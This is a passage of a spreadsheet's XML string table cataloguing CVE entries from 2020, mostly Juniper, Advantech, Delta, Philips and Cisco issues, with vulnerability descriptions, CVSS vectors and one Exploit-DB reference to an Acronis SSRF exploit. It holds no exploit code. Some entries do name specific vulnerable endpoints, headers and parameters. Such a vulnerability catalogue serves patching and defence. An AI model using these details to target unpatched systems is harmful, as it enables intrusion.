16.1 versions prior to 16.1R7-S7; 17.1 versions prior to 17.1R2-S12, 17.1R3; 17.2 versions prior to 17.2R2-S7, 17.2R3; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110, 17.2X75-D44; 17.3 versions prior to 17.3R2-S5, 17.3R3-S5; 17.4 versions prior to 17.4R1-S8, 17.4R2; 18.1 versions prior to 18.1R2-S4, 18.1R3; 18.2X75 versions prior to 18.2X75-D20.</t>
  </si>
  <si>
    <t>CVE-2020-16131</t>
  </si>
  <si>
    <t>Tiki before 21.2 allows XSS because [\s\/"\'] is not properly considered in lib/core/TikiFilter/PreventXss.php.</t>
  </si>
  <si>
    <t>CVE-2020-16134</t>
  </si>
  <si>
    <t>An issue was discovered on Swisscom Internet Box 2, Internet Box Standard, Internet Box Plus prior to 10.04.38, Internet Box 3 prior to 11.01.20, and Internet Box light prior to 08.06.06. Given the (user-configurable) credentials for the local Web interface or physical access to a device's plus or reset button, an attacker can create a user with elevated privileges on the Sysbus-API. This can then be used to modify local or remote SSH access, thus allowing a login session as the superuser.</t>
  </si>
  <si>
    <t>CVE-2020-16135</t>
  </si>
  <si>
    <t>libssh 0.9.4 has a NULL pointer dereference in tftpserver.c if ssh_buffer_new returns NULL.</t>
  </si>
  <si>
    <t>CVE-2020-16136</t>
  </si>
  <si>
    <t>In tgstation-server 4.4.0 and 4.4.1, an authenticated user with permission to download logs can download any file on the server machine (accessible by the owner of the server process) via directory traversal ../ sequences in /Administration/Logs/ requests. The attacker is unable to enumerate files, however.</t>
  </si>
  <si>
    <t>CVE-2020-16137</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** A privilege escalation issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to reset the credentials for the SSH administrative console to arbitrary values. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.</t>
  </si>
  <si>
    <t>CVE-2020-16138</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.</t>
  </si>
  <si>
    <t>CVE-2020-16139</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.</t>
  </si>
  <si>
    <t>CVE-2020-1614</t>
  </si>
  <si>
    <t>A Use of Hard-coded Credentials vulnerability exists in the NFX250 Series for the vSRX Virtual Network Function (VNF) instance, which allows an attacker to take control of the vSRX VNF instance if they have the ability to access an administrative service (e.g. SSH) on the VNF, either locally, or through the network. This issue only affects the NFX250 Series vSRX VNF. No other products or platforms are affected. This issue is only applicable to environments where the vSRX VNF root password has not been configured. This issue affects the Juniper Networks NFX250 Network Services Platform vSRX VNF instance on versions prior to 19.2R1.</t>
  </si>
  <si>
    <t>CVE-2020-16140</t>
  </si>
  <si>
    <t>The search functionality of the Greenmart theme 2.4.2 for WordPress is vulnerable to XSS.</t>
  </si>
  <si>
    <t>CVE-2020-16142</t>
  </si>
  <si>
    <t>On Mercedes-Benz C Class AMG Premium Plus c220 BlueTec vehicles, the Bluetooth stack mishandles %x and %c format-string specifiers in a device name in the COMAND infotainment software.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-16143</t>
  </si>
  <si>
    <t>The seafile-client client 7.0.8 for Seafile is vulnerable to DLL hijacking because it loads exchndl.dll from the current working directory.</t>
  </si>
  <si>
    <t>CVE-2020-16144</t>
  </si>
  <si>
    <t>When using an object storage like S3 as the file store, when a user creates a public link to a folder where anonymous users can upload files, and another user uploads a virus the files antivirus app would detect the virus but fails to delete it due to permission issues. This affects the files_antivirus component versions before 0.15.2 for ownCloud.</t>
  </si>
  <si>
    <t>CVE-2020-16145</t>
  </si>
  <si>
    <t>Roundcube Webmail before 1.3.15 and 1.4.8 allows stored XSS in HTML messages during message display via a crafted SVG document. This issue has been fixed in 1.4.8 and 1.3.15.</t>
  </si>
  <si>
    <t>CVE-2020-16146</t>
  </si>
  <si>
    <t>Espressif ESP-IDF 2.x, 3.0.x through 3.0.9, 3.1.x through 3.1.7, 3.2.x through 3.2.3, 3.3.x through 3.3.2, and 4.0.x through 4.0.1 has a Buffer Overflow in BluFi provisioning in btc_blufi_recv_handler function in blufi_prf.c. An attacker can send a crafted BluFi protocol Write Attribute command to characteristic 0xFF01. With manipulated packet fields, there is a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-16147</t>
  </si>
  <si>
    <t>The login page in Telmat AccessLog &lt;= 6.0 (TAL_20180415) allows an attacker to get root shell access via Unauthenticated code injection over the network.</t>
  </si>
  <si>
    <t>CVE-2020-16148</t>
  </si>
  <si>
    <t>The ping page of the administration panel in Telmat AccessLog &lt;= 6.0 (TAL_20180415) allows an attacker to get root shell access via authenticated code injection over the network.</t>
  </si>
  <si>
    <t>CVE-2020-1615</t>
  </si>
  <si>
    <t>The factory configuration for vMX installations, as shipped, includes default credentials for the root account. Without proper modification of these default credentials by the administrator, an attacker could exploit these credentials and access the vMX instance without authorization. This issue affects Juniper Networks Junos OS: 17.1 versions prior to 17.1R2-S11, 17.1R3-S2 on vMX; 17.2 versions prior to 17.2R3-S3 on vMX; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7 on vMX; 17.4 versions prior to 17.4R2-S9, 17.4R3 on vMX; 18.1 versions prior to 18.1R3-S9 on vMX; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3 on vMX; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D60 on vMX; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1 on vMX; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3 on vMX; 19.1 versions prior to 19.1R1-S4, 19.1R2, 19.1R3 on vMX; 19.2 versions prior to 19.2R1-S3, 19.2R2 on vMX; 19.3 versions prior to 19.3R1-S1, 19.3R2 on vMX.</t>
  </si>
  <si>
    <t>CVE-2020-16150</t>
  </si>
  <si>
    <t>A Lucky 13 timing side channel in mbedtls_ssl_decrypt_buf in library/ssl_msg.c in Trusted Firmware Mbed TLS through 2.23.0 allows an attacker to recover secret key information. This affects CBC mode because of a computed time difference based on a padding length.</t>
  </si>
  <si>
    <t>CVE-2020-16152</t>
  </si>
  <si>
    <t>The NetConfig UI administrative interface in Extreme Networks ExtremeWireless Aerohive HiveOS and IQ Engine through 10.0r8a allows attackers to execute PHP code as the root user via remote HTTP requests that insert this code into a log file and then traverse to that file.</t>
  </si>
  <si>
    <t>CVE-2020-16154</t>
  </si>
  <si>
    <t>The App::cpanminus package 1.7044 for Perl allows Signature Verification Bypass.</t>
  </si>
  <si>
    <t>CVE-2020-16155</t>
  </si>
  <si>
    <t>The CPAN::Checksums package 2.12 for Perl does not uniquely define signed data.</t>
  </si>
  <si>
    <t>CVE-2020-16156</t>
  </si>
  <si>
    <t>CPAN 2.28 allows Signature Verification Bypass.</t>
  </si>
  <si>
    <t>CVE-2020-16157</t>
  </si>
  <si>
    <t>A Stored XSS vulnerability exists in Nagios Log Server before 2.1.7 via the Notification Methods -&gt; Email Users menu.</t>
  </si>
  <si>
    <t>CVE-2020-16158</t>
  </si>
  <si>
    <t>GoPro gpmf-parser through 1.5 has a stack out-of-bounds write vulnerability in GPMF_ExpandComplexTYPE(). Parsing malicious input can result in a crash or potentially arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-16159</t>
  </si>
  <si>
    <t>GoPro gpmf-parser 1.5 has a heap out-of-bounds read and segfault in GPMF_ScaledData(). Parsing malicious input can result in a crash or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1616</t>
  </si>
  <si>
    <t>Due to insufficient server-side login attempt limit enforcement, a vulnerability in the SSH login service of Juniper Networks Juniper Advanced Threat Prevention (JATP) Series and Virtual JATP (vJATP) devices allows an unauthenticated, remote attacker to perform multiple login attempts in excess of the configured login attempt limit. Successful exploitation will allow the attacker to perform brute-force password attacks on the SSH service. This issue affects: Juniper Networks JATP and vJATP versions prior to 5.0.6.0.</t>
  </si>
  <si>
    <t>CVE-2020-16160</t>
  </si>
  <si>
    <t>GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_Decompress(). Parsing malicious input can result in a crash.</t>
  </si>
  <si>
    <t>CVE-2020-16161</t>
  </si>
  <si>
    <t>GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_ScaledData(). Parsing malicious input can result in a crash.</t>
  </si>
  <si>
    <t>CVE-2020-16162</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be counterarguments related to backwards compatibility.</t>
  </si>
  <si>
    <t>CVE-2020-16163</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in RIPE NCC RPKI Validator 3.x before 3.1-2020.07.06.14.28. RRDP fetches proceed even with a lack of validation of a TLS HTTPS endpoint. This allows remote attackers to bypass intended access restrictions, or to trigger denial of service to traffic directed to co-dependent routing systems. NOTE: third parties assert that the behavior is intentionally permitted by RFC 8182.</t>
  </si>
  <si>
    <t>CVE-2020-16164</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from the RPKI relying party's view. NOTE: some third parties may regard this as a preferred behavior, not a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-16165</t>
  </si>
  <si>
    <t>The DAO/DTO implementation in SpringBlade through 2.7.1 allows SQL Injection in an ORDER BY clause. This is related to the /api/blade-log/api/list ascs and desc parameters.</t>
  </si>
  <si>
    <t>CVE-2020-16166</t>
  </si>
  <si>
    <t>The Linux kernel through 5.7.11 allows remote attackers to make observations that help to obtain sensitive information about the internal state of the network RNG, aka CID-f227e3ec3b5c. This is related to drivers/char/random.c and kernel/time/timer.c.</t>
  </si>
  <si>
    <t>CVE-2020-16167</t>
  </si>
  <si>
    <t>Missing Authentication for Critical Function in temi Robox OS prior to 120, temi Android app up to 1.3.7931 allows remote attackers to receive and answer calls intended for another temi user. Answering the call this way grants motor control of the temi in addition to audio/video via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-16168</t>
  </si>
  <si>
    <t>Origin Validation Error in temi Robox OS prior to 120, temi Android app up to 1.3.7931 allows remote attackers to access the REST API and MQTT broker used by the temi and send it custom data/requests via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-16169</t>
  </si>
  <si>
    <t>Authentication Bypass Using an Alternate Path or Channel in temi Robox OS prior to120, temi Android app up to 1.3.7931 allows remote attackers to gain elevated privileges on the temi and have it automatically answer the attacker's calls, granting audio, video, and motor control via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-1617</t>
  </si>
  <si>
    <t>This issue occurs on Juniper Networks Junos OS devices which do not support Advanced Forwarding Interface (AFI) / Advanced Forwarding Toolkit (AFT). Devices using AFI and AFT are not exploitable to this issue. An improper initialization of memory in the packet forwarding architecture in Juniper Networks Junos OS non-AFI/AFT platforms which may lead to a Denial of Service (DoS) vulnerability being exploited when a genuine packet is received and inspected by non-AFT/AFI sFlow and when the device is also configured with firewall policers. This first genuine packet received and inspected by sampled flow (sFlow) through a specific firewall policer will cause the device to reboot. After the reboot has completed, if the device receives and sFlow inspects another genuine packet seen through a specific firewall policer, the device will generate a core file and reboot. Continued inspection of these genuine packets will create an extended Denial of Service (DoS) condition. Depending on the method for service restoration, e.g. hard boot or soft reboot, a core file may or may not be generated the next time the packet is received and inspected by sFlow. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S9, 17.4R3 on PTX1000 and PTX10000 Series, QFX10000 Series; 18.1 versions prior to 18.1R3-S9 on PTX1000 and PTX10000 Series, QFX10000 Series; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D30 on PTX1000 and PTX10000 Series, QFX10000 Series; 18.2 versions prior to 18.2R3 on PTX1000 and PTX10000 Series, QFX10000 Series; 18.3 versions prior to 18.3R3 on PTX1000 and PTX10000 Series, QFX10000 Series. This issue is not applicable to Junos OS versions before 17.4R1. This issue is not applicable to Junos OS Evolved or Junos OS with Advanced Forwarding Toolkit (AFT) forwarding implementations which use a different implementation of sFlow. The following example information is unrelated to this issue and is provided solely to assist you with determining if you have AFT or not. Example: A Junos OS device which supports the use of EVPN signaled VPWS with Flexible Cross Connect uses the AFT implementation. Since this configuration requires support and use of the AFT implementation to support this configuration, the device is not vulnerable to this issue as the sFlow implementation is different using the AFT architecture. For further details about AFT visit the AFI / AFT are in the links below. If you are uncertain if you use the AFI/AFT implementation or not, there are configuration examples in the links below which you may use to determine if you are vulnerable to this issue or not. If the commands work, you are. If not, you are not. You may also use the Feature Explorer to determine if AFI/AFT is supported or not. If you are still uncertain, please contact your support resources.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49113.py</t>
  </si>
  <si>
    <t>Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF</t>
  </si>
  <si>
    <t>CVE-2020-16170</t>
  </si>
  <si>
    <t>Use of Hard-coded Credentials in temi Robox OS prior to 120, temi Android app up to 1.3.7931 allows remote attackers to listen in on any ongoing calls between temi robots and their users if they can brute-force/guess a six-digit value via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-16171</t>
  </si>
  <si>
    <t>An issue was discovered in Acronis Cyber Backup before 12.5 Build 16342. Some API endpoints on port 9877 under /api/ams/ accept an additional custom Shard header. The value of this header is afterwards used in a separate web request issued by the application itself. This can be abused to conduct SSRF attacks against otherwise unreachable Acronis services that are bound to localhost such as the NotificationService on 127.0.0.1:30572.</t>
  </si>
  <si>
    <t>CVE-2020-1618</t>
  </si>
  <si>
    <t>On Juniper Networks EX and QFX Series, an authentication bypass vulnerability may allow a user connected to the console port to login as root without any password. This issue might only occur in certain scenarios: • At the first reboot after performing device factory reset using the command “request system zeroize”; or • A temporary moment during the first reboot after the software upgrade when the device configured in Virtual Chassis mode. This issue affects Juniper Networks Junos OS on EX and QFX Series: 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S4; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S4; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R3-S3; 17.3 versions prior to 17.3R2-S5, 17.3R3-S6; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R2; 18.3 versions prior to 18.3R1-S7, 18.3R2. This issue does not affect Juniper Networks Junos OS 12.3.</t>
  </si>
  <si>
    <t>CVE-2020-1619</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability in Juniper Networks QFX10K Series, EX9200 Series, MX Series, and PTX Series with Next-Generation Routing Engine (NG-RE), allows a local authenticated high privileged user to access the underlying WRL host. This issue only affects QFX10K Series with NG-RE, EX9200 Series with NG-RE, MX Series with NG-RE and PTX Series with NG-RE; which uses vmhost. This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3; 17.2 versions prior to 17.2R1-S9, 17.2R3-S3; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S7, 17.4R3; 18.1 versions prior to 18.1R3-S4; 18.2 versions prior to 18.2R3; 18.2X75 versions prior to 18.2X75-D50; 18.3 versions prior to 18.3R2; 18.4 versions prior to 18.4R2. To identify whether the device has NG-RE with vmhost, customer can run the following command: &gt; show vmhost status Compute cluster: rainier-re-cc Compute Node: rainier-re-cn, Online If the "show vmhost status" is not supported, then the device does not have NG-RE with vmhost.</t>
  </si>
  <si>
    <t>CVE-2020-16192</t>
  </si>
  <si>
    <t>LimeSurvey 4.3.2 allows reflected XSS because application/controllers/LSBaseController.php lacks code to validate parameters.</t>
  </si>
  <si>
    <t>CVE-2020-16193</t>
  </si>
  <si>
    <t>osTicket before 1.14.3 allows XSS because include/staff/banrule.inc.php has an unvalidated echo $info['notes'] call.</t>
  </si>
  <si>
    <t>CVE-2020-16194</t>
  </si>
  <si>
    <t>An Insecure Direct Object Reference (IDOR) vulnerability was found in Prestashop Opart devis &lt; 4.0.2. Unauthenticated attackers can have access to any user's invoice and delivery address by exploiting an IDOR on the delivery_address and invoice_address fields.</t>
  </si>
  <si>
    <t>CVE-2020-16197</t>
  </si>
  <si>
    <t>An issue was discovered in Octopus Deploy 3.4. A deployment target can be configured with an Account or Certificate that is outside the scope of the deployment target. An authorised user can potentially use a certificate that they are not in scope to use. An authorised user is also able to obtain certificate metadata by associating a certificate with certain resources that should fail scope validation.</t>
  </si>
  <si>
    <t>CVE-2020-16198</t>
  </si>
  <si>
    <t>Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. When an attacker claims to have a given identity, the software does not prove or insufficiently proves the claim is correct.</t>
  </si>
  <si>
    <t>CVE-2020-16199</t>
  </si>
  <si>
    <t>Delta Industrial Automation CNCSoft ScreenEditor, Versions 1.01.23 and prior. Multiple stack-based buffer overflow vulnerabilities may be exploited by processing specially crafted project files, which may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-1620</t>
  </si>
  <si>
    <t>A local, authenticated user with shell can obtain the hashed values of login passwords via configd streamer log. This issue affects all versions of Junos OS Evolved prior to 19.3R1.</t>
  </si>
  <si>
    <t>CVE-2020-16200</t>
  </si>
  <si>
    <t>Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an attacker to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.</t>
  </si>
  <si>
    <t>757</t>
  </si>
  <si>
    <t>CVE-2020-16201</t>
  </si>
  <si>
    <t>Delta Industrial Automation CNCSoft ScreenEditor, Versions 1.01.23 and prior. Multiple out-of-bounds read vulnerabilities may be exploited by processing specially crafted project files, which may allow an attacker to read information.</t>
  </si>
  <si>
    <t>CVE-2020-16202</t>
  </si>
  <si>
    <t>WebAccess Node (All versions prior to 9.0.1) has incorrect permissions set for resources used by specific services, which may allow code execution with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-16203</t>
  </si>
  <si>
    <t>Delta Industrial Automation CNCSoft ScreenEditor, Versions 1.01.23 and prior. An uninitialized pointer may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-16204</t>
  </si>
  <si>
    <t>The affected product is vulnerable due to an undocumented interface found on the device, which may allow an attacker to execute commands as root on the device on the N-Tron 702-W / 702M12-W (all versions).</t>
  </si>
  <si>
    <t>CVE-2020-16205</t>
  </si>
  <si>
    <t>Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5).</t>
  </si>
  <si>
    <t>CVE-2020-16206</t>
  </si>
  <si>
    <t>The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions).</t>
  </si>
  <si>
    <t>CVE-2020-16207</t>
  </si>
  <si>
    <t>Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Multiple heap-based buffer overflow vulnerabilities may be exploited by opening specially crafted project files that may overflow the heap, which may allow remote code execution, disclosure/modification of information, or cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-16208</t>
  </si>
  <si>
    <t>The affected product is vulnerable to cross-site request forgery, which may allow an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link on the N-Tron 702-W / 702M12-W (all versions).</t>
  </si>
  <si>
    <t>CVE-2020-16209</t>
  </si>
  <si>
    <t>A malicious attacker could exploit the interface of the Fieldcomm Group HART-IP (release 1.0.0.0) by constructing messages with sufficiently large payloads to overflow the internal buffer and crash the device, or obtain control of the device.</t>
  </si>
  <si>
    <t>CVE-2020-1621</t>
  </si>
  <si>
    <t>A local, authenticated user with shell can obtain the hashed values of login passwords via configd traces. This issue affects all versions of Junos OS Evolved prior to 19.3R1.</t>
  </si>
  <si>
    <t>CVE-2020-16210</t>
  </si>
  <si>
    <t>The affected product is vulnerable to reflected cross-site scripting, which may allow an attacker to remotely execute arbitrary code and perform actions in the context of an attacked user on the N-Tron 702-W / 702M12-W (all versions).</t>
  </si>
  <si>
    <t>CVE-2020-16211</t>
  </si>
  <si>
    <t>Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. An out-of-bounds read vulnerability may be exploited by processing specially crafted project files, which may allow an attacker to read information.</t>
  </si>
  <si>
    <t>CVE-2020-16212</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. The application on the surveillance station operates in kiosk mode, which is vulnerable to local breakouts that could allow an attacker with physical access to escape the restricted environment with limited privileges.</t>
  </si>
  <si>
    <t>CVE-2020-16213</t>
  </si>
  <si>
    <t>Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Processing specially crafted project files lacking proper validation of user supplied data may cause the system to write outside the intended buffer area, which may allow remote code execution, disclosure/modification of information, or cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-16214</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software saves user-provided information into a comma-separated value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-16215</t>
  </si>
  <si>
    <t>Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Processing specially crafted project files lacking proper validation of user supplied data may cause a stack-based buffer overflow, which may allow remote code execution, disclosure/modification of information, or cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-16216</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product receives input or data but does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly, which can induce a denial-of-service condition through a system restart.</t>
  </si>
  <si>
    <t>CVE-2020-16217</t>
  </si>
  <si>
    <t>Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. A double free vulnerability caused by processing specially crafted project files may allow remote code execution, disclosure/modification of information, or cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-16218</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is then used as a webpage and served to other users. Successful exploitation could lead to unauthorized access to patient data via a read-only web application.</t>
  </si>
  <si>
    <t>CVE-2020-16219</t>
  </si>
  <si>
    <t>Delta Electronics TPEditor Versions 1.97 and prior. An out-of-bounds read may be exploited by processing specially crafted project files. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-1622</t>
  </si>
  <si>
    <t>A local, authenticated user with shell can obtain the hashed values of login passwords and shared secrets via the EvoSharedObjStore. This issue affects all versions of Junos OS Evolved prior to 19.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-16220</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product receives input that is expected to be well-formed (i.e., to comply with a certain syntax) but it does not validate or incorrectly validates that the input complies with the syntax, causing the certificate enrollment service to crash. It does not impact monitoring but prevents new devices from enrolling.</t>
  </si>
  <si>
    <t>1286</t>
  </si>
  <si>
    <t>CVE-2020-16221</t>
  </si>
  <si>
    <t>Delta Electronics TPEditor Versions 1.97 and prior. A stack-based buffer overflow may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-16222</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. When an actor claims to have a given identity, the software does not prove or insufficiently proves the claim is correct.</t>
  </si>
  <si>
    <t>CVE-2020-16223</t>
  </si>
  <si>
    <t>Delta Electronics TPEditor Versions 1.97 and prior. A heap-based buffer overflow may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-16224</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software parses a formatted message or structure but does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data, causing the application on the surveillance station to restart.</t>
  </si>
  <si>
    <t>130</t>
  </si>
  <si>
    <t>CVE-2020-16225</t>
  </si>
  <si>
    <t>Delta Electronics TPEditor Versions 1.97 and prior. A write-what-where condition may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-16226</t>
  </si>
  <si>
    <t>Multiple Mitsubishi Electric products are vulnerable to impersonations of a legitimate device by a malicious actor, which may allow an attacker to remotely execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-16227</t>
  </si>
  <si>
    <t>Delta Electronics TPEditor Versions 1.97 and prior. An improper input validation may be exploited by processing a specially crafted project file not validated when the data is entered by a user. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.</t>
  </si>
  <si>
    <t>CVE-2020-16228</t>
  </si>
  <si>
    <t>Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a compromised certificate.</t>
  </si>
  <si>
    <t>299</t>
  </si>
  <si>
    <t>CVE-2020-16229</t>
  </si>
  <si>
    <t>Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Processing specially crafted project files lacking proper validation of user supplied data may cause a type confusion condition, which may allow remote code execution, disclosure/modification of information, or cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-1623</t>
  </si>
  <si>
    <t>A local, authenticated user with shell can view sensitive configuration information via the ev.ops configuration file. This issue affects all versions of Junos OS Evolved prior to 19.2R1.</t>
  </si>
  <si>
    <t>CVE-2020-16230</t>
  </si>
  <si>
    <t>All version of Ewon Flexy and Cosy prior to 14.1 use wildcards such as (*) under which domains can request resources. An attacker with local access and high privileges could inject scripts into the Cross-origin Resource Sharing (CORS) configuration that could abuse this vulnerability, allowing the attacker to retrieve limited confidential information through sniffing.</t>
  </si>
  <si>
    <t>CVE-2020-16231</t>
  </si>
  <si>
    <t>The affected Bachmann Electronic M-Base Controllers of version MSYS v1.06.14 and later use weak cryptography to protect device passwords. Affected controllers that are actively supported include MX207, MX213, MX220, MC206, MC212, MC220, and MH230 hardware controllers, and affected end-of-life controller include MC205, MC210, MH212, ME203, CS200, MP213, MP226, MPC240, MPC265, MPC270, MPC293, MPE270, and CPC210 hardware controllers. Security Level 0 is set at default from the manufacturer, which could allow an unauthenticated remote attacker to gain access to the password hashes. Security Level 4 is susceptible if an authenticated remote attacker or an unauthenticated person with physical access to the device reads and decrypts the password to conduct further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-16232</t>
  </si>
  <si>
